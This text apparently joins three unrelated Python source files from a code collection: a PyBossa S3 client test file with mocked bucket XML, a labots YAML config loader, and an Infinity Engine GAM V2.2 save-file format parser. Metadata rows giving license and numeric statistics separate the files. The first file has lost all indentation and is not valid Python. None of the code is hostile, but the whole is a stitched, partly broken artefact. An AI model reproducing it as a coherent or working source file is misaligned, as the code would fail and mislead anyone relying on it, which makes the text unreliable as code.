# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PYBOSSA. If not, see <http://www.gnu.org/licenses/>.
from mock import patch, MagicMock
from nose.tools import assert_raises
import json
from pybossa.s3_client import S3Client, NoSuchBucket, PrivateBucket
class TestS3Client(object):
def make_response(self, text, status_code=200):
fake_response = MagicMock()
fake_response.text = text
fake_response.status_code = status_code
return fake_response
bucket_with_content = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>16535035993_1080p.mp4</Key>
<LastModified>2016-01-29T08:55:41.000Z</LastModified>
<ETag>"10055dfebe62cf30e34d87fd27b28efc"</ETag>
<Size>11801468</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>BFI-demo.mp4</Key>
<LastModified>2016-01-29T08:55:38.000Z</LastModified>
<ETag>"b24442a1484b6b8f2b4e08c43e0abd3f"</ETag>
<Size>27063915</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>
""")
empty_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
</ListBucketResult>
""")
no_such_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket does not exist</Message>
<BucketName>test-pybosa</BucketName>
<RequestId>5DB95818E2273F2A</RequestId>
<HostId>2xqg6pMK20zocCIN0DpqzDVEmbNkqKdTrp0BT/K2EUBbSIek5+7333DjDVuvpN0fFR/Pp/+IkM8=</HostId>
</Error>
""")
bucket_with_folder = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>myfolder/</Key>
<LastModified>2016-01-29T08:56:15.000Z</LastModified>
<ETag>"d41d8cd98f00b204e9800998ecf8427e"</ETag>
<Size>0</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>
""")
private_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>AccessDenied</Code>
<Message>Access Denied</Message>
<RequestId>0C189C667703869B</RequestId>
<HostId>e6HNleTSx+vQHCXsjphJNLumbwd2YfYfZMrEBEkGOF/0jCMDZf6RIrgUAooa+HT86f0Azr27/h4=</HostId>
</Error>
""")
@patch('pybossa.s3_client.requests')
def test_objects_return_empty_list_for_an_empty_bucket(self, requests):
resp = self.make_response(self.empty_bucket, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [], objects
@patch('pybossa.s3_client.requests')
def test_objects_return_list_of_object_names_in_a_bucket(self, requests):
resp = self.make_response(self.bucket_with_content, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [u'16535035993_1080p.mp4', u'BFI-demo.mp4'], objects
@patch('pybossa.s3_client.requests')
def test_objects_not_returns_folders_inside_bucket(self, requests):
resp = self.make_response(self.bucket_with_folder, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [], objects
@patch('pybossa.s3_client.requests')
def test_objects_raises_NoSuchBucket_if_bucket_does_not_exist(self, requests):
resp = self.make_response(self.no_such_bucket, 404)
requests.get.return_value = resp
assert_raises(NoSuchBucket, S3Client().objects, 'test-pybossa')
@patch('pybossa.s3_client.requests')
def test_objects_raises_PrivateBucket_if_bucket_is_private(self, requests):
        resp = self.make_response(self.private_bucket, 403)
requests.get.return_value = resp
assert_raises(PrivateBucket, S3Client().objects, 'test-pybossa')
| agpl-3.0 | -8,953,775,506,088,436,000 | 37.041096 | 105 | 0.620274 | false |
LastAvenger/labots | labots/config/config.py | 1 | 3322 | import logging
import yaml
from typing import Dict
from labots.config import checker
from labots.common import meta
# Initialize logging
logger = logging.getLogger(__name__)
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
class Config(AttrDict):
pass
def load_config(raw: str) -> Config:
""" Load config from a yaml format string. """
    d = yaml.safe_load(raw)  # safe_load: config input must not construct arbitrary objects
try:
checker.check(d, [
checker.Item(key = ['log', 'level'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = 'info'),
checker.Item(key = ['log', 'output'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = 'stderr'),
checker.Item(key = ['log', 'color'],
checkers = [checker.is_bool],
default = True),
checker.Item(key = ['irc', 'host'],
checkers = [checker.is_str, checker.is_not_empty_str],
required = True),
checker.Item(key = ['irc', 'port'],
checkers = [checker.is_int, checker.is_port],
default = 6667,
required = True),
checker.Item(key = ['irc', 'tls'],
checkers = [checker.is_bool],
default = False),
checker.Item(key = ['irc', 'tls_verify'],
checkers = [checker.is_bool],
default = True),
checker.Item(key = ['irc', 'server_password'],
checkers = [checker.is_str],
default = None),
checker.Item(key = ['irc', 'nickname'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.name),
checker.Item(key = ['irc', 'username'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.name),
checker.Item(key = ['irc', 'realname'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.url),
checker.Item(key = ['irc', 'user_password'],
checkers = [checker.is_str],
default = None),
checker.Item(key = ['manager', 'bots'],
checkers = [checker.is_str],
required = True),
checker.Item(key = ['manager', 'config'],
checkers = [checker.is_str]),
checker.Item(key = ['server', 'listen'],
checkers = [checker.is_str],
default = meta.default_listen),
checker.Item(key = ['storage', 'db'],
checkers = [checker.is_str],
default = './storage.db'),
checker.Item(key = ['cache', 'db'],
checkers = [checker.is_str],
default = './cache.db'),
])
except (KeyError, ValueError) as e:
raise e
return Config(_build_attr_dict(d))
def _build_attr_dict(d: Dict) -> AttrDict:
""" Recursively convert all dict to AttrDict. """
r = {}
for k, v in d.items():
if isinstance(v, dict):
r[k] = _build_attr_dict(v)
else:
r[k] = v
return AttrDict(r)
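# Illustrative load (keys mirror the checker items above; defaults such
# as irc.port are assumed to be filled in by checker.check):
def _example_load():
    cfg = load_config('irc: {host: irc.example.org}\nmanager: {bots: ./bots}')
    return cfg.irc.host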
| gpl-3.0 | 1,553,425,372,541,772,800 | 34.340426 | 70 | 0.491872 | false |
gemrb/iesh | infinity/formats/gam_v22.py | 1 | 31222 | # -*-python-*-
# ie_shell.py - Simple shell for Infinity Engine-based game files
# Copyright (C) 2004-2009 by Jaroslav Benkovsky, <[email protected]>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Conforms to IESDP 18.10.2019
from infinity.format import Format, register_format
class GAM_V22_Format (Format):
header_desc = (
{ 'key': 'signature',
'type': 'STR4',
'off': 0x0000,
'label': 'Signature',
'default': 'GAME' },
{ 'key': 'version',
'type': 'STR4',
'off': 0x0004,
'label': 'Version',
'default': 'V2.2'},
{ 'key': 'game_time',
'type': 'DWORD',
'off': 0x0008,
'label': 'Game time (300 units==1 hour)' },
{ 'key': 'formation',
'type': 'WORD',
'off': 0x000C,
'label': 'Selected formation'},
{ 'key': 'formation_button',
'type': 'WORD',
'off': 0x000E,
'count': 5,
'label': 'Formation button'},
{ 'key': 'gold',
'type': 'DWORD',
'off': 0x0018,
'label': 'Party gold'},
{ 'key': 'pc_cnt0',
'type': 'WORD',
'off': 0x001C,
'label': 'Unknown / PC count'},
{ 'key': 'weather',
'type': 'WORD',
'off': 0x001E,
'mask': { 0x01: 'rain', 0x02: 'snow' },
'label': 'Weather'},
{ 'key': 'pc_off',
'type': 'DWORD',
'off': 0x0020,
'label': 'PC offset'},
{ 'key': 'pc_cnt',
'type': 'DWORD',
'off': 0x0024,
'label': 'PC count (incl. protagonist)'},
{ 'key': 'unknown28',
'type': 'DWORD',
'off': 0x0028,
'label': '(offset to party inventory)'},
{ 'key': 'unknown2C',
'type': 'DWORD',
'off': 0x002C,
'label': '(count of party inventory)'},
{ 'key': 'npc_off',
'type': 'DWORD',
'off': 0x0030,
'label': 'NPC offset'},
{ 'key': 'npc_cnt',
'type': 'DWORD',
'off': 0x0034,
'label': 'NPC count'},
{ 'key': 'global_off',
'type': 'DWORD',
'off': 0x0038,
'label': 'GLOBAL variables offset'},
{ 'key': 'global_cnt',
'type': 'DWORD',
'off': 0x003C,
'label': 'GLOBAL variables count'},
{ 'key': 'main_area',
'type': 'RESREF',
'off': 0x0040,
'label': 'Main area'},
{ 'key': 'familiar_extra_off',
'type': 'DWORD',
'off': 0x0048,
'label': 'Unknown / Familiar extra offset'},
{ 'key': 'journal_entry_cnt',
'type': 'DWORD',
'off': 0x004C,
'label': 'Journal entries count'},
{ 'key': 'journal_entry_off',
'type': 'DWORD',
'off': 0x0050,
'label': 'Journal entries offset'},
{ 'key': 'reputation',
'type': 'DWORD',
'off': 0x0054,
'label': 'Party reputation (*10)'},
{ 'key': 'current_area',
'type': 'RESREF',
'off': 0x0058,
'label': 'Current area'},
{ 'key': 'gui_flags',
'type': 'DWORD',
'off': 0x0060,
'mask': {0x01: 'party_ai_enabled',
0x02: 'text_window_size1',
0x04: 'text_window_size2',
0x08: 'unknown bit3',
0x10: 'hide_gui',
0x20: 'hide_options',
0x40: 'hide_portraits',
0x80: 'hide_automap_notes' },
'label': 'GUI flags'},
{ 'key': 'loading_progress',
'type': 'DWORD',
'off': 0x0064,
'enum': {0: 'restrict_xp_to_bg1_limit',
1: 'restrict_xp_to_totsc_limit',
2: 'restrict_xp_to_soa_limit',
3: 'XNEWAREA.2DA processing to be done',
4: 'XNEWAREA.2DA processing complete',
5: 'TOB active'},
'label': 'Unknown / Loading progress'},
{ 'key': 'familiar_off',
'type': 'DWORD',
'off': 0x0068,
'label': 'Familiar info offset'},
{ 'key': 'stored_location_off',
'type': 'DWORD',
'off': 0x006C,
'label': 'Stored locations offset'},
{ 'key': 'stored_location_cnt',
'type': 'DWORD',
'off': 0x0070,
'label': 'Stored locations count'},
{ 'key': 'game_time',
'type': 'DWORD',
'off': 0x0074,
'label': 'Game time (real seconds)'},
{ 'key': 'pocket_plane_location_off',
'type': 'DWORD',
'off': 0x0078,
'label': 'Pocket plane locations offset'},
{ 'key': 'pocket_plane_location_cnt',
'type': 'DWORD',
'off': 0x007C,
'label': 'Pocket plane locations count'},
{ 'key': 'unknown80',
'type': 'BYTES',
'off': 0x0080,
'size': 52,
'label': 'Unknown 80'},
)
npc_desc = (
{ 'key': 'character_selection',
'type': 'WORD',
'off': 0x0000,
'enum': {0: 'not selected', 1: 'selected', 0x8000: 'dead'},
'label': 'Character selection'},
{ 'key': 'party_order',
'type': 'WORD',
'off': 0x0002,
'label': 'Party order'},
{ 'key': 'cre_off',
'type': 'DWORD',
'off': 0x0004,
'label': 'CRE offset'},
{ 'key': 'cre_size',
'type': 'DWORD',
'off': 0x0008,
'label': 'CRE size'},
{ 'key': 'character_name',
'type': 'STR8',
'off': 0x000C,
'size': 8,
'label': 'Character name'},
{ 'key': 'orientation',
'type': 'DWORD',
'off': 0x0014,
'label': 'Orientation'},
{ 'key': 'current_area',
'type': 'RESREF',
'off': 0x0018,
'label': 'Current area'},
{ 'key': 'x',
'type': 'WORD',
'off': 0x0020,
'label': 'X coordinate'},
{ 'key': 'y',
'type': 'WORD',
'off': 0x0022,
'label': 'Y coordinate'},
{ 'key': 'view_x',
'type': 'WORD',
'off': 0x0024,
'label': 'Viewing rectange X coordinate'},
{ 'key': 'view_y',
'type': 'WORD',
'off': 0x0026,
'label': 'Viewing rectangle Y coordinate'},
{ 'key': 'modal_action',
'type': 'WORD',
'off': 0x0028,
'label': 'Modal action'},
{ 'key': 'happiness',
'type': 'WORD',
'off': 0x002A,
'label': 'Happiness'},
{ 'key': 'num_times_interacted_npc_count',
'type': 'DWORD',
'off': 0x002C,
'count': 24,
'label': 'Num times interacted NPC count (unused)' },
{ 'key': 'quick_weapon_slot_index',
'type': 'WORD',
'off': 0x008C,
'count': 8,
'label': 'Index into slots.ids for main Quick Weapon or offhand, interchanging (FFFF=none)' },
{ 'key': 'quick_slot_usable',
'type': 'WORD',
'off': 0x009C,
'count': 8,
'label': 'Is the quick weapon slot usable?' },
{ 'key': 'quick_spell_resource',
'type': 'RESREF',
'off': 0x00AC,
'count': 9,
'label': 'Quick spell resource' },
{ 'key': 'quick_spell_class',
'type': 'BYTE',
'off': 0x00F4,
'count': 9,
'label': 'Quick spell class' },
{ 'key': 'quick_spell_unknown',
'type': 'BYTE',
'off': 0x00FD,
'count': 1,
'label': '(Quick spell) unknown' },
{ 'key': 'quick_item_slot_index',
'type': 'WORD',
'off': 0x00FE,
'count': 3,
'label': 'Index into slots.ids for Quick Item (FFFF=none)' },
{ 'key': 'quick_item_slot_ability',
'type': 'WORD',
'off': 0x0104,
'count': 3,
'label': 'Quick Item slot usable' },
{ 'key': 'quick_innate',
'type': 'RESREF',
'off': 0x010A,
'count': 9,
'label': 'Quick innate' },
{ 'key': 'quick_song',
'type': 'RESREF',
'off': 0x0152,
'count': 9,
'label': 'Quick song' },
{ 'key': 'quick_slot',
'type': 'RESREF',
'off': 0x019A,
'count': 9,
'label': 'Quick slot' },
{ 'key': 'name',
'type': 'STR32',
'off': 0x01BE,
'label': 'Name' },
{ 'key': 'talkcount',
'type': 'DWORD',
'off': 0x01C2,
'label': 'Talkcount' },
{ 'key': 'stats',
'type': 'BYTES',
'off': 0x01C6,
'size': 116,
'label': 'Stats' },
{ 'key': 'soundset',
'type': 'RESREF',
'off': 0x023A,
'label': 'Sound set' },
{ 'key': 'voiceset',
'type': 'STR32',
'off': 0x0242,
'label': 'Voice set' },
{ 'key': 'unknown_1',
'type': 'DWORD',
'off': 0x0262,
'label': 'Unknown 1' },
{ 'key': 'unknown_2',
'type': 'DWORD',
'off': 0x0266,
'label': 'Unknown 2' },
{ 'key': 'unknown_3',
'type': 'DWORD',
'off': 0x026A,
'label': 'Unknown 3' },
{ 'key': 'expertise',
'type': 'DWORD',
'off': 0x026E,
'label': 'Expertise' },
{ 'key': 'power_attack',
'type': 'DWORD',
'off': 0x0272,
'label': 'Power attack' },
{ 'key': 'arterial_strike',
'type': 'DWORD',
'off': 0x0276,
'label': 'Arterial Strike' },
{ 'key': 'hamstring',
'type': 'DWORD',
'off': 0x027A,
'label': 'Hamstring' },
{ 'key': 'rapid_shot',
'type': 'DWORD',
'off': 0x027E,
'label': 'Rapid Shot' },
{ 'key': 'unknown_4',
'type': 'DWORD',
'off': 0x0282,
'label': 'Unknown 4' },
{ 'key': 'unknown_5',
'type': 'BYTES',
'size': 3,
'off': 0x0286,
'label': 'Unknown 5' },
{ 'key': 'selected_w_slot',
'type': 'WORD',
'off': 0x0289,
'label': 'Selected weapon slot' },
{ 'key': 'unknown_6',
'type': 'BYTES',
'size': 153,
'off': 0x028B,
'label': 'Unknown 6' },
)
pc_desc = npc_desc
global_desc = (
{ 'key': 'name',
'type': 'STR32',
'off': 0x0000,
'label': 'Variable name' },
{ 'key': 'type',
'type': 'WORD',
'off': 0x0020,
# TODO: add mask: (bit 0: int, bit 1: float, bit 2: script name, bit 3: resref, bit 4: strref, bit 5: dword)
'label': 'Type' },
{ 'key': 'refval',
'type': 'WORD',
'off': 0x0022,
'label': 'Ref value' },
{ 'key': 'dwval',
'type': 'DWORD',
'off': 0x0024,
'label': 'DWORD value' },
{ 'key': 'intval',
'type': 'DWORD',
'off': 0x0028,
'label': 'INT value' },
{ 'key': 'dblval',
'type': 'BYTES',
'off': 0x002c,
'size': 8,
'label': 'DOUBLE value' },
{ 'key': 'scrnameval',
'type': 'BYTES',
'off': 0x0033,
'size': 32,
'label': 'Script name value' },
)
journal_entry_desc = (
{ 'key': 'text',
'type': 'STRREF',
'off': 0x0000,
'label': 'Journal text' },
{ 'key': 'time',
'type': 'DWORD',
'off': 0x0004,
'label': 'Time (secs)' },
{ 'key': 'current_chapter',
'type': 'BYTE',
'off': 0x0008,
'label': 'Current chapter number' },
{ 'key': 'unknown09',
'type': 'BYTE',
'off': 0x0009,
'label': 'Unknown 09' },
{ 'key': 'section',
'type': 'BYTE',
'off': 0x000A,
'mask': { 0x01: 'quests', 0x02: 'Completed quests', 0x04: 'Journal info' },
'label': 'Journal section' },
{ 'key': 'location_flag',
'type': 'BYTE',
'off': 0x000B,
'enum': { 0x1F: 'external TOT/TOH', 0xFF: 'internal TLK' },
'label': 'Location flag' },
)
familiar_info_desc = (
{ 'key': 'lg_familiar',
'type': 'RESREF',
'off': 0x0000,
'label': 'Lawful familiar' },
{ 'key': 'ln_familiar',
'type': 'RESREF',
'off': 0x0008,
'label': 'Lawful neutral familiar' },
{ 'key': 'le_familiar',
'type': 'RESREF',
'off': 0x0010,
'label': 'Lawful evil familiar' },
{ 'key': 'ng_familiar',
'type': 'RESREF',
'off': 0x0018,
'label': 'Neutral good familiar' },
{ 'key': 'nn_familiar',
'type': 'RESREF',
'off': 0x0020,
'label': 'True neutral familiar' },
{ 'key': 'ne_familiar',
'type': 'RESREF',
'off': 0x0028,
'label': 'Neutral evil familiar' },
{ 'key': 'cg_familiar',
'type': 'RESREF',
'off': 0x0030,
          'label': 'Chaotic good familiar' },
{ 'key': 'cn_familiar',
'type': 'RESREF',
'off': 0x0038,
'label': 'Chaotic neutral familiar' },
{ 'key': 'ce_familiar',
'type': 'RESREF',
'off': 0x0040,
'label': 'Chaotic evil familiar' },
{ 'key': 'unknown48',
'type': 'DWORD',
'off': 0x0048,
'label': 'Unknown 48' },
{ 'key': 'lg_1_familiar_cnt',
'type': 'DWORD',
'off': 0x004C,
'label': 'LG level 1 familiar count' },
{ 'key': 'lg_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0050,
'label': 'LG level 2 familiar count' },
{ 'key': 'lg_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0054,
'label': 'LG level 3 familiar count' },
{ 'key': 'lg_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0058,
'label': 'LG level 4 familiar count' },
{ 'key': 'lg_5_familiar_cnt',
'type': 'DWORD',
'off': 0x005C,
'label': 'LG level 5 familiar count' },
{ 'key': 'lg_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0060,
'label': 'LG level 6 familiar count' },
{ 'key': 'lg_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0064,
'label': 'LG level 7 familiar count' },
{ 'key': 'lg_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0068,
'label': 'LG level 8 familiar count' },
{ 'key': 'lg_9_familiar_cnt',
'type': 'DWORD',
'off': 0x006C,
'label': 'LG level 9 familiar count' },
{ 'key': 'ln_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0070,
'label': 'LN level 1 familiar count' },
{ 'key': 'ln_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0074,
'label': 'LN level 2 familiar count' },
{ 'key': 'ln_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0078,
'label': 'LN level 3 familiar count' },
{ 'key': 'ln_4_familiar_cnt',
'type': 'DWORD',
'off': 0x007C,
'label': 'LN level 4 familiar count' },
{ 'key': 'ln_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0080,
'label': 'LN level 5 familiar count' },
{ 'key': 'ln_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0084,
'label': 'LN level 6 familiar count' },
{ 'key': 'ln_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0088,
'label': 'LN level 7 familiar count' },
{ 'key': 'ln_8_familiar_cnt',
'type': 'DWORD',
'off': 0x008C,
'label': 'LN level 8 familiar count' },
{ 'key': 'ln_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0090,
'label': 'LN level 9 familiar count' },
{ 'key': 'cg_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0094,
'label': 'CG level 1 familiar count' },
{ 'key': 'cg_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0098,
'label': 'CG level 2 familiar count' },
{ 'key': 'cg_3_familiar_cnt',
'type': 'DWORD',
'off': 0x009C,
'label': 'CG level 3 familiar count' },
{ 'key': 'cg_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00A0,
'label': 'CG level 4 familiar count' },
{ 'key': 'cg_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00A4,
'label': 'CG level 5 familiar count' },
{ 'key': 'cg_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00A8,
'label': 'CG level 6 familiar count' },
{ 'key': 'cg_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00AC,
'label': 'CG level 7 familiar count' },
{ 'key': 'cg_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00B0,
'label': 'CG level 8 familiar count' },
{ 'key': 'cg_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00B4,
'label': 'CG level 9 familiar count' },
{ 'key': 'ng_1_familiar_cnt',
'type': 'DWORD',
'off': 0x00B8,
'label': 'NG level 1 familiar count' },
{ 'key': 'ng_2_familiar_cnt',
'type': 'DWORD',
'off': 0x00BC,
'label': 'NG level 2 familiar count' },
{ 'key': 'ng_3_familiar_cnt',
'type': 'DWORD',
'off': 0x00C0,
'label': 'NG level 3 familiar count' },
{ 'key': 'ng_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00C4,
'label': 'NG level 4 familiar count' },
{ 'key': 'ng_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00C8,
'label': 'NG level 5 familiar count' },
{ 'key': 'ng_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00CC,
'label': 'NG level 6 familiar count' },
{ 'key': 'ng_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00D0,
'label': 'NG level 7 familiar count' },
{ 'key': 'ng_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00D4,
'label': 'NG level 8 familiar count' },
{ 'key': 'ng_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00D8,
'label': 'NG level 9 familiar count' },
{ 'key': 'tn_1_familiar_cnt',
'type': 'DWORD',
'off': 0x00DC,
'label': 'TN level 1 familiar count' },
{ 'key': 'tn_2_familiar_cnt',
'type': 'DWORD',
'off': 0x00E0,
'label': 'TN level 2 familiar count' },
{ 'key': 'tn_3_familiar_cnt',
'type': 'DWORD',
'off': 0x00E4,
'label': 'TN level 3 familiar count' },
{ 'key': 'tn_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00E8,
'label': 'TN level 4 familiar count' },
{ 'key': 'tn_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00EC,
'label': 'TN level 5 familiar count' },
{ 'key': 'tn_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00F0,
'label': 'TN level 6 familiar count' },
{ 'key': 'tn_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00F4,
'label': 'TN level 7 familiar count' },
{ 'key': 'tn_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00F8,
'label': 'TN level 8 familiar count' },
{ 'key': 'tn_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00FC,
'label': 'TN level 9 familiar count' },
{ 'key': 'ne_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0100,
'label': 'NE level 1 familiar count' },
{ 'key': 'ne_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0104,
'label': 'NE level 2 familiar count' },
{ 'key': 'ne_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0108,
'label': 'NE level 3 familiar count' },
{ 'key': 'ne_4_familiar_cnt',
'type': 'DWORD',
'off': 0x010C,
'label': 'NE level 4 familiar count' },
{ 'key': 'ne_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0110,
'label': 'NE level 5 familiar count' },
{ 'key': 'ne_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0114,
'label': 'NE level 6 familiar count' },
{ 'key': 'ne_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0118,
'label': 'NE level 7 familiar count' },
{ 'key': 'ne_8_familiar_cnt',
'type': 'DWORD',
'off': 0x011C,
'label': 'NE level 8 familiar count' },
{ 'key': 'ne_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0120,
'label': 'NE level 9 familiar count' },
{ 'key': 'le_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0124,
'label': 'LE level 1 familiar count' },
{ 'key': 'le_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0128,
'label': 'LE level 2 familiar count' },
{ 'key': 'le_3_familiar_cnt',
'type': 'DWORD',
'off': 0x012C,
'label': 'LE level 3 familiar count' },
{ 'key': 'le_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0130,
'label': 'LE level 4 familiar count' },
{ 'key': 'le_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0134,
'label': 'LE level 5 familiar count' },
{ 'key': 'le_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0138,
'label': 'LE level 6 familiar count' },
{ 'key': 'le_7_familiar_cnt',
'type': 'DWORD',
'off': 0x013C,
'label': 'LE level 7 familiar count' },
{ 'key': 'le_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0140,
'label': 'LE level 8 familiar count' },
{ 'key': 'le_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0144,
'label': 'LE level 9 familiar count' },
{ 'key': 'cn_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0148,
'label': 'CN level 1 familiar count' },
{ 'key': 'cn_2_familiar_cnt',
'type': 'DWORD',
'off': 0x014C,
'label': 'CN level 2 familiar count' },
{ 'key': 'cn_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0150,
'label': 'CN level 3 familiar count' },
{ 'key': 'cn_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0154,
'label': 'CN level 4 familiar count' },
{ 'key': 'cn_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0158,
'label': 'CN level 5 familiar count' },
{ 'key': 'cn_6_familiar_cnt',
'type': 'DWORD',
'off': 0x015C,
'label': 'CN level 6 familiar count' },
{ 'key': 'cn_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0160,
'label': 'CN level 7 familiar count' },
{ 'key': 'cn_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0164,
'label': 'CN level 8 familiar count' },
{ 'key': 'cn_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0168,
'label': 'CN level 9 familiar count' },
{ 'key': 'ce_1_familiar_cnt',
'type': 'DWORD',
'off': 0x016C,
'label': 'CE level 1 familiar count' },
{ 'key': 'ce_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0170,
'label': 'CE level 2 familiar count' },
{ 'key': 'ce_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0174,
'label': 'CE level 3 familiar count' },
{ 'key': 'ce_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0178,
'label': 'CE level 4 familiar count' },
{ 'key': 'ce_5_familiar_cnt',
'type': 'DWORD',
'off': 0x017C,
'label': 'CE level 5 familiar count' },
{ 'key': 'ce_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0180,
'label': 'CE level 6 familiar count' },
{ 'key': 'ce_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0184,
'label': 'CE level 7 familiar count' },
{ 'key': 'ce_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0188,
'label': 'CE level 8 familiar count' },
{ 'key': 'ce_9_familiar_cnt',
'type': 'DWORD',
'off': 0x018C,
'label': 'CE level 9 familiar count' },
)
stored_location_desc = (
{ 'key': 'area',
'type': 'RESREF',
'off': 0x0000,
'label': 'Area' },
{ 'key': 'x',
'type': 'WORD',
'off': 0x0008,
'label': 'X coordinate' },
{ 'key': 'y',
'type': 'WORD',
'off': 0x000A,
'label': 'Y coordinate' },
)
pocket_plane_location_desc = stored_location_desc
def __init__ (self):
Format.__init__ (self)
self.expect_signature = 'GAME'
self.pc_list = []
self.npc_list = []
self.global_list = []
self.journal_entry_list = []
self.stored_location_list = []
self.pocket_plane_location_list = []
def read (self, stream):
self.read_header (stream)
self.read_list (stream, 'pc')
self.read_list (stream, 'npc')
self.read_list (stream, 'global')
self.read_list (stream, 'journal_entry')
self.read_list (stream, 'stored_location')
self.read_list (stream, 'pocket_plane_location')
obj = {}
self.read_struc (stream, self.header['familiar_off'], self.familiar_info_desc, obj)
self.familiar_info = obj
# FIXME: familiar info
def update (self):
off = self.size_struc (self.header_desc)
self.header['pc_cnt'] = len (self.pc_list)
self.header['pc_off'] = off
off += self.size_struc (self.pc_desc) * len (self.pc_list)
        pass  # TODO: the remaining section offsets (npc, global, journal, ...) are not updated yet
    def write (self, stream):
        # FIXME: writing V2.2 saves is not implemented; the calls below only
        # sketch the intended flow ('off' was never defined, so they would
        # crash before the explicit error was ever reached).
        #self.write_header (stream)
        #off = self.write_list (stream, off, 'actor')
        raise RuntimeError ("Not implemented")
def printme (self):
self.print_header ()
self.print_list ('pc')
self.print_list ('npc')
self.print_list ('global')
self.print_list ('journal_entry')
self.print_list ('stored_location')
